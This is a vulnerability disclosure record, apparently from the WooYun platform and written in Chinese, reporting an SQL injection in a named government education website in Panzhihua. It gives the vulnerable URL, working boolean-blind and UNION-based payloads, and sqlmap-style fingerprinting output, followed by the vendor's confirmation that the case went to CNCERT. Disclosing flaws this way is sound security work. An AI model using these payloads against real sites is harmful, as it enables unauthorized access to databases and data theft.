漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-03-05: 细节已通知厂商并且等待厂商处理中
2014-03-10: 厂商已经确认,细节仅向厂商公开
2014-03-20: 细节向核心白帽子及相关领域专家公开
2014-03-30: 细节向普通白帽子公开
2014-04-09: 细节向实习白帽子公开
2014-04-19: 细节向公众公开
简要描述:
攀枝花市东区基础教育网SQL注入漏洞
详细说明:
1.http://www.pzhdqedu.gov.cn/php/wzgl/wzgl_show.php?id=588
漏洞证明:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=588 AND 4905=4905
Type: UNION query
Title: MySQL UNION query (NULL) - 17 columns
Payload: id=-4263 UNION ALL SELECT 58,58,58,CONCAT(0x7173696a71,0x596d46767a
58736e4f45,0x7179657771),58,58,58,58,58,58,58,58,58,58,58,58,58#
---
[20:32:33] [INFO] testing MySQL
[20:32:34] [INFO] confirming MySQL
[20:32:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2000
web application technology: PHP 4.0.4, Microsoft IIS 5.0
back-end DBMS: MySQL < 4.0.0
修复方案:
过滤
版权声明:转载请注明来源 来打酱油的@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2014-03-10 21:12
厂商回复:
已经转由CNCERT下发给四川分中心处置。
最新状态:
暂无